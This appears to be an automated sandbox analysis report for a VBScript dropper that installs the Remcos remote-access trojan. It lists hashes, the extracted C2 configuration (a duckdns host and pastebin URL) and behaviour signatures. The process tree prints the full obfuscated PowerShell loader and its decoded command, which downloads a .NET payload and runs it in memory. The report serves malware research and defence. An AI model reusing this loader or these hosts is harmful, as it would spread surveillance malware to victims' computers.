Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
26-08-2024 04:55
General
-
Target
sostener.vbs
-
Size
2.8MB
-
MD5
9f31e7ec269ef7f755b7bd75e0579b18
-
SHA1
bdfa3e314195f23437a420782b4912e60a685a96
-
SHA256
4ab223a4ed0eaced6dc3a2cc74953a453770bb030336f349cd37f2ef24b65c30
-
SHA512
9aec4444247c4f4b8c0a0203dec53abc3fe64de2c2e86de79e57ecd003920d2ffacef90c09afcfdb51e61df98dcc3423feeaa97eade1a6e6854adc8ff10e8b3c
-
SSDEEP
192:8rkrkrErErErErErkrkrErErErErErkrkrErErErErErkrkrErErErErErkrkrE1:2WPE09IvR4
Malware Config
Extracted
http://pastebin.com/raw/V9y5Q5vv
Extracted
remcos
Matrix Fenix*
newssssssssssssss.duckdns.org:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
registros.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-XDNGQ0
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Capturas de pantalla
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Blocklisted process makes network request 6 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 16 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J☼Bn☼G4☼dQBk☼H☼☼I☼☼9☼C☼☼Jw☼w☼Cc☼Ow☼k☼Gw☼ZQB3☼G8☼ag☼g☼D0☼I☼☼n☼CU☼c☼B6☼EE☼YwBP☼Gc☼SQBu☼E0☼cg☼l☼Cc☼OwBb☼FM☼eQBz☼HQ☼ZQBt☼C4☼TgBl☼HQ☼LgBT☼GU☼cgB2☼Gk☼YwBl☼F☼☼bwBp☼G4☼d☼BN☼GE☼bgBh☼Gc☼ZQBy☼F0☼Og☼6☼FM☼ZQBy☼HY☼ZQBy☼EM☼ZQBy☼HQ☼aQBm☼Gk☼YwBh☼HQ☼ZQBW☼GE☼b☼Bp☼GQ☼YQB0☼Gk☼bwBu☼EM☼YQBs☼Gw☼YgBh☼GM☼aw☼g☼D0☼I☼B7☼CQ☼d☼By☼HU☼ZQB9☼Ds☼WwBT☼Hk☼cwB0☼GU☼bQ☼u☼E4☼ZQB0☼C4☼UwBl☼HI☼dgBp☼GM☼ZQBQ☼G8☼aQBu☼HQ☼TQBh☼G4☼YQBn☼GU☼cgBd☼Do☼OgBT☼GU☼YwB1☼HI☼aQB0☼Hk☼U☼By☼G8☼d☼Bv☼GM☼bwBs☼C☼☼PQ☼g☼Fs☼UwB5☼HM☼d☼Bl☼G0☼LgBO☼GU☼d☼☼u☼FM☼ZQBj☼HU☼cgBp☼HQ☼eQBQ☼HI☼bwB0☼G8☼YwBv☼Gw☼V☼B5☼H☼☼ZQBd☼Do☼OgBU☼Gw☼cw☼x☼DI☼OwBb☼EI☼eQB0☼GU☼WwBd☼F0☼I☼☼k☼Hc☼eQBh☼HY☼eQ☼g☼D0☼I☼Bb☼HM☼eQBz☼HQ☼ZQBt☼C4☼QwBv☼G4☼dgBl☼HI☼d☼Bd☼Do☼OgBG☼HI☼bwBt☼EI☼YQBz☼GU☼Ng☼0☼FM☼d☼By☼Gk☼bgBn☼Cg☼I☼☼o☼E4☼ZQB3☼C0☼TwBi☼Go☼ZQBj☼HQ☼I☼BO☼GU☼d☼☼u☼Fc☼ZQBi☼EM☼b☼Bp☼GU☼bgB0☼Ck☼LgBE☼G8☼dwBu☼Gw☼bwBh☼GQ☼UwB0☼HI☼aQBu☼Gc☼K☼☼g☼Cg☼TgBl☼Hc☼LQBP☼GI☼agBl☼GM☼d☼☼g☼E4☼ZQB0☼C4☼VwBl☼GI☼QwBs☼Gk☼ZQBu☼HQ☼KQ☼u☼EQ☼bwB3☼G4☼b☼Bv☼GE☼Z☼BT☼HQ☼cgBp☼G4☼Zw☼o☼Cc☼a☼B0☼HQ☼c☼☼6☼C8☼LwBw☼GE☼cwB0☼GU☼YgBp☼G4☼LgBj☼G8☼bQ☼v☼HI☼YQB3☼C8☼Vg☼5☼Hk☼NQBR☼DU☼dgB2☼Cc☼KQ☼g☼Ck☼I☼☼p☼Ds☼WwBz☼Hk☼cwB0☼GU☼bQ☼u☼EE☼c☼Bw☼EQ☼bwBt☼GE☼aQBu☼F0☼Og☼6☼EM☼dQBy☼HI☼ZQBu☼HQ☼R☼Bv☼G0☼YQBp☼G4☼LgBM☼G8☼YQBk☼Cg☼J☼B3☼Hk☼YQB2☼Hk☼KQ☼u☼Ec☼ZQB0☼FQ☼eQBw☼GU☼K☼☼n☼EM☼b☼Bh☼HM☼cwBM☼Gk☼YgBy☼GE☼cgB5☼DM☼LgBD☼Gw☼YQBz☼HM☼MQ☼n☼Ck☼LgBH☼GU☼d☼BN☼GU☼d☼Bo☼G8☼Z☼☼o☼Cc☼TQBz☼HE☼QgBJ☼GI☼WQ☼n☼Ck☼LgBJ☼G4☼dgBv☼Gs☼ZQ☼o☼CQ☼bgB1☼Gw☼b☼☼s☼C☼☼WwBv☼GI☼agBl☼GM☼d☼Bb☼F0☼XQ☼g☼Cg☼Jw☼w☼C8☼e☼BS☼HU☼NQBM☼C8☼Z☼☼v☼GU☼ZQ☼u☼GU☼d☼Bz☼GE☼c☼☼v☼C8☼OgBz☼H☼☼d☼B0☼Gg☼Jw☼g☼Cw☼I☼☼k☼Gw☼ZQB3☼G8☼ag☼g☼Cw☼I☼☼n☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼Xw☼t☼C0☼LQ☼t☼C0☼LQ☼t☼Cc☼L☼☼g☼CQ☼ZwBu☼HU☼Z☼Bw☼Cw☼I☼☼n☼DE☼Jw☼s☼C☼☼JwBS☼G8☼Z☼Bh☼Cc☼I☼☼p☼Ck☼Ow☼=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $MkplqW.replace('☼','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs');powershell -command $KByHL;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$gnudp = '0';$lewoj = 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $wyavy = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($wyavy).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/xRu5L/d/ee.etsap//:sptth' , $lewoj , '____________________________________________-------', $gnudp, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5ae3cd7bb41b337e314e811d022b907a6
SHA169f328fc1066105cc82bcc0fe1d80ea375d6c20f
SHA256c6f77c05d98951f37f1abd8b225bc2259b354a8ab8c56591ed291f7505fd366d
SHA512aa720fbe3f2c06c49d2d4e6e4c847ebab543c0d976179bd7fbda378a615a64353a21141f7442a02b1e8a2e0253fba5d1faea4bf9228e3433eab1dc159826e888
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD5367b1c81198bfdcdba813c2c336627a3
SHA137fe6414eafaaed4abb91c1aafde62c5b688b711
SHA2561141e163d84d5ef0038593c866647f27c55510de2147dc1578130e518a22cced
SHA512e0493957e6602efb156d372e5e66147056f6e3c2e01996ba9b4e04f82b2b1e4c7236d0e3681dce9ab4911a62546b6a141f1ae731de6e8184e758caf120cf594b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
136KB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
32KB
-
Filesize
40KB